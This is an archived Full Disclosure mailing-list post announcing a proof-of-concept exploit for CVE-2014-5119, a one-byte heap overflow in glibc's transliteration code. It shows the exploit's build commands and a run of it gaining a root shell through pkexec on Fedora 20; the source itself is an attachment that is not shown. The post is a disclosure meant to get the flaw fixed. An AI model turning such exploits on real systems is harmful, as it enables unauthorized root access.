lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 25 Aug 2014 19:00:15 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: [FD] CVE-2014-5119 glibc __gconv_translit_find() exploit

List, back in July, I described CVE-2014-5119, a fiendish single-fixed-byte
heap metadata overflow in the glibc internal routine
__gconv_translit_find().

This is caused by the file extension being incorrectly appended to the
transliteration module filename. The result is one too few bytes are
allocated, and a single nul byte is written out of bounds. This issue
affects real programs, that are typically default installed and setuid root.

Despite explaining that my research suggests this is exploitable, it
appears there has been general skepticism that single-fixed-byte overflows
are still exploitable with modern allocator metadata hardening.

As a result, the issue has been largely dismissed and downgraded in
severity. As little progress has been made in resolving the issue thus far,
we're publishing a proof of concept today. This exploit is specific to
Fedora 20 32-bit, but the issue is not specific to Fedora, and exploitation
on other systems and platforms is possible.

This issue is complex, and fiendishly difficult to exploit. Thanks to Chris
Evans for his heap expertise and insight. Some more information is
available on our team blog.

http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html

$ make clean
rm -f pkexploit pty *.o a.out *.so
[taviso@...alhost glibc]$ make
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl  pkexploit.c   -o pkexploit
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320
-ldl  pty.c   -o pty
cc -ggdb3 -O0 -Wno-multichar -std=gnu99 -D_OPEN_TRANSLIT_OFF=0x00023320  -c
-o exploit.o exploit.c
cc exploit.o -fPIC -shared -o exploit.so
Execute pkexploit to attempt exploitation.
[taviso@...alhost glibc]$ ./pkexploit
[*] ---------------------------------------------------
[*] CVE-2014-5119 glibc __gconv_translit_find() exploit
[*] ------------------------ taviso & scarybeasts -----
[*] Attempting to invoke pseudo-pty helper (this will take a few seconds)...
[*] Read 7295 bytes of output from pseudo-pty helper, parsing...
[*] pseudo-pty helper succeeded
[*] attempting to parse libc fatal error message...
[*] discovered chunk pointer from `corrupted double-lin...`, => 0x507e3658
[*] attempting to parse the libc maps dump...
[*] found libc.so mapped @0x40215000
[*] expecting libc.so bss to begin at 0x406c7000
[*] successfully located first morecore chunk w/tag @0x407d6000
[*] allocating space for argument structure...
[*] creating command string...
[*] creating a tls_dtor_list node...
[*] open_translit() symbol will be at 0x40238320
[*] offsetof(struct known_trans, fname) => 32
[*] appending `./exploit.so` to list node
[*] building parameter list...
[*] anticipating tls_dtor_list to be at 0x406c82d4
[*] execvpe(pkexec...)...
Error accessing / : File name too long
uid=0(root) gid=1000(taviso) groups=0(root),10(wheel),1000(taviso)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# exit
exit

Download attachment "CVE-2014-5119.tar.gz" of type "application/x-gzip" (6066 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists